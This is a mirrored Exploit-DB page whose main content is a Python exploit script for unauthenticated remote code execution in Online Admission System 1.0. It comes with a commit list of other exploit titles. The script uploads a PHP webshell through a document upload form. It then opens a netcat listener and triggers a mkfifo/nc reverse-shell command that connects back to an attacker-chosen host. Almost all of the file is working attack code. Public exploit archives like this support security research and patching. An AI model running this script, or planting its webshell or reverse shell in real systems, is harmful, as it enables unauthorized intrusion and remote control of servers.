bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50623.py
Offensive Security 1472d8e723 DB: 2022-01-06 
32 changes to exploits/shellcodes

Siemens S7 Layer 2 - Denial of Service (DoS)
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
Automox Agent 32 - Local Privilege Escalation
ConnectWise Control 19.2.24707 - Username Enumeration
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
AWebServer GhostBuilding 18 - Denial of Service (DoS)
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
Dixell XWEB 500 - Arbitrary File Write
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
CMSimple 5.4 - Cross Site Scripting (XSS)
RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
Nettmp NNT 5.1 - SQLi Authentication Bypass
Hostel Management System 2.1 - Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Hospitals Patient Records Management System 1.0 - Account TakeOver
Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
openSIS Student Information System 8.0 - 'multiple' SQL Injection
Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
2022-01-06 05:01:54 +00:00

88 lines
No EOL
3 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)
#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess
print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')
path = '/' #change me if the path to the /oas is in the root directory or another subdir
class Exploit:
def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport
def exploitation(self):
payload = """<?php system($_GET['cmd']); ?>"""
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
url = 'http://' + target_ip + ':' + target_port + path
r = requests.Session()
print('[*] Resolving URL...')
r1 = r.get(url + 'documents.php')
time.sleep(3)
#Upload the payload file
print('[*] Uploading the webshell payload...')
files = {
'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
'ftndoc': ('', '', 'application/octet-stream'),
'ftcdoc': ('', '', 'application/octet-stream'),
'fdmdoc': ('', '', 'application/octet-stream'),
'ftcdoc': ('', '', 'application/octet-stream'),
'fdcdoc': ('', '', 'application/octet-stream'),
'fide': ('', '', 'application/octet-stream'),
'fsig': ('', '', 'application/octet-stream'),
}
data = {'fpicup':'Submit Query'}
r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
time.sleep(3)
print('[*] Setting up netcat listener...')
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)
print('[*] Spawning reverse shell...')
print('[*] Watchout!')
r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
time.sleep(3)
if (r3.status_code == 200):
print('[*] Got shell!')
while True:
listener.wait()
else:
print('[-] Something went wrong!')
listener.terminate()
def get_args():
parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
args = parser.parse_args()
return args
args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()
Reference in a new issue View git blame Copy permalink